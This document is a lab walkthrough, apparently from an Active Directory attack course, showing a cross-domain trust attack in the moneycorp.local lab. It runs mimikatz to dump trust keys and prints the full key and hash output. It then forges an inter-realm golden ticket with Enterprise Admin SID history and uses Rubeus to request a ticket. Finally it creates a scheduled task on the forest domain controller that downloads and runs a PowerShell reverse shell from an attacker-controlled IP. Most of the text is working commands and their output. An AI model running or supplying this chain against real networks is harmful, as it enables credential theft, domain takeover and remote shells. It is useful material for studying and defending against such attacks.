First let’s get The trust keys
.\\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"
As we see we got the trust keys of the forest
[dcorp-dc]: PS C:\\Users\\Administrator\\Documents> .\\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::trust /patch
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/27/2024 12:12:19 AM - CLEAR - 26 43 99 cb bb 6d 10 f0 04 37 57 bd fa 1f 77 d6 93 28 68 1f 5d 35 a8 e3 b1 25 46 e7
* aes256_hmac cfb1299ec914c29461e1b57009c8b39c9239aca222a86d748be4e6a953ac7ca4
* aes128_hmac e5f04970548f0b240ee6947605fce7b5
* rc4_hmac_nt 68a7f836e94f9668b8a215d486f23a38
[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 6/27/2024 12:12:19 AM - CLEAR - 26 43 99 cb bb 6d 10 f0 04 37 57 bd fa 1f 77 d6 93 28 68 1f 5d 35 a8 e3 b1 25 46 e7
* aes256_hmac 47641f8bc724115760c2ef5ab1941996dcef5be9bdce13bcf5057d3036694667
* aes128_hmac 13c6b14ec690d6e5e17377bd9d285c8a
* rc4_hmac_nt 68a7f836e94f9668b8a215d486f23a38
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/27/2024 12:11:53 AM - CLEAR - 9c fe ec 1b d3 ed ee 2f 21 34 aa f7 77 c1 6d 5e d6 65 50 6f 82 33 df 17 5c 3a 95 49
* aes256_hmac fd9f9e762002c3a0c0d3b4681ae0bd9f0abf1484a0a8c8523ddf325b4035ade7
* aes128_hmac 9e9914fc26168e51a4d44a3851ec9506
* rc4_hmac_nt 881744a51055cdda6698c535e629fc1d
[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 6/27/2024 12:11:53 AM - CLEAR - 9c fe ec 1b d3 ed ee 2f 21 34 aa f7 77 c1 6d 5e d6 65 50 6f 82 33 df 17 5c 3a 95 49
* aes256_hmac 786dc532d32610fbe36bc004490091ad1c744186269195dd58ac9ac36b665fd0
* aes128_hmac 276b6a9960f4158694f028405d7395a9
* rc4_hmac_nt 881744a51055cdda6698c535e629fc1d
Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:10 PM - CLEAR - cf e8 36 49 c3 08 a6 2a fe 76 d2 0a 0c 5c aa e5 67 a1 af f6 25 bb ec d0 ed 1e 08 5d
* aes256_hmac 64424a8f2a4def288b986a3747c3eed7493e1d75bfff0461afbb072180e61afe
* aes128_hmac f4aaf5eb7059977b9ea4cde31ee8eddc
* rc4_hmac_nt 214a518fb9edf4be816f207b9ba19d69
[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:10 PM - CLEAR - cf e8 36 49 c3 08 a6 2a fe 76 d2 0a 0c 5c aa e5 67 a1 af f6 25 bb ec d0 ed 1e 08 5d
* aes256_hmac 2bf47a8aca4420dbd00c836677489636bace0cf279d20387eae2c935f8816652
* aes128_hmac 2ed7f416a3a42794e54e3b567eaa0e53
* rc4_hmac_nt 214a518fb9edf4be816f207b9ba19d69
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:04 PM - CLEAR - 0c f8 9f d9 54 46 8a 29 23 0c 65 1f 45 69 c8 c7 6d f0 5c bf eb 69 63 52 f9 3c 2a dd
* aes256_hmac fed485bb861c2a70cf8436cc2bc561bdd7502ff3f06a3e0116e93de860617216
* aes128_hmac 25f49733618f43d90ac60661e0d45e6a
* rc4_hmac_nt 5254e4d05c51a801670314042ae33f40
[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:04 PM - CLEAR - 0c f8 9f d9 54 46 8a 29 23 0c 65 1f 45 69 c8 c7 6d f0 5c bf eb 69 63 52 f9 3c 2a dd
* aes256_hmac b589e722cc645c71e1b6743b64ec68ad4f2e6ffab7ca0fe7e40971713f4ac465
* aes128_hmac 0dd190b6a2217e9f8dbc82d2b7e78e95
* rc4_hmac_nt 5254e4d05c51a801670314042ae33f40
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/12/2024 10:16:07 PM - CLEAR - 55 cb 05 4c 82 1a 31 bb b8 2d c5 b9 cc fd 2d 3e 33 d5 e0 92 93 cf f9 ac 6f ac 11 ed
* aes256_hmac 225bd65839ee11918c44d7a4819736245a4d54024173ef4a91ef5fb2c29669df
* aes128_hmac aebc8f223defffec09befded2c30d6c4
* rc4_hmac_nt 1fcd1aeb03aab0b98840321e4a0d17f3
[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:07 PM - CLEAR - 55 cb 05 4c 82 1a 31 bb b8 2d c5 b9 cc fd 2d 3e 33 d5 e0 92 93 cf f9 ac 6f ac 11 ed
* aes256_hmac 03dbd3425e6cc9aa87ed201713d7a8dbb04ef5c651407580a5b2c11e67bff85b
* aes128_hmac 34de1a1db802e71580e907214774dcc9
* rc4_hmac_nt 1fcd1aeb03aab0b98840321e4a0d17f3
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/12/2024 10:03:00 PM - CLEAR - 10 fc b0 8b ae b3 a7 21 5f 52 40 d5 f7 e9 45 5a fe 6e ee dd da f7 4b 69 f6 c8 3d a9
* aes256_hmac 684bc2d9fa516539e42ba27f8638ce273444b01768d23001bbbb1c96c2f3a7ca
* aes128_hmac 6b81568547ccd72e875ba5bf92870f6c
* rc4_hmac_nt c1a089de694b99c31207cf85ca9401c7
[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:00 PM - CLEAR - 10 fc b0 8b ae b3 a7 21 5f 52 40 d5 f7 e9 45 5a fe 6e ee dd da f7 4b 69 f6 c8 3d a9
* aes256_hmac 903cd48563f50588d7993632939015e44f15edafe9e0d6ffdc55dec6e990f20c
* aes128_hmac 1181192f6c730988662d1d43a55daba9
* rc4_hmac_nt c1a089de694b99c31207cf85ca9401c7
mimikatz(commandline) # exit
Bye!
Now let’s Forge an Inter Realm Ticket
.\\BetterSafetyKatz '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:68a7f836e94f9668b8a215d486f23a38 /service:krbtgt /ticket:c:\\ad\\tools\\trust.kirbi"' "exit"
Nice now all we have todo is to ask a TGS from the Moneycorp Domain Contorller
Rubeus.exe asktgs /service:HOST/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ticket:c:\\ad\\tools\\trust.kirbi /ptt
Let’s list our tickets
klist
Once we Forged a Ticket for the HOST we can create a Schedule Task so that I can get reverse shell
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "mcorp\\Administrator" /TN "STCheck" /TR "powershell.exe -c 'IEX(iwr <http://172.16.100.22/Invoke-PowerShellTcp.ps1> -UseBasicParsing)'"
Now let’s start the the Task
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck"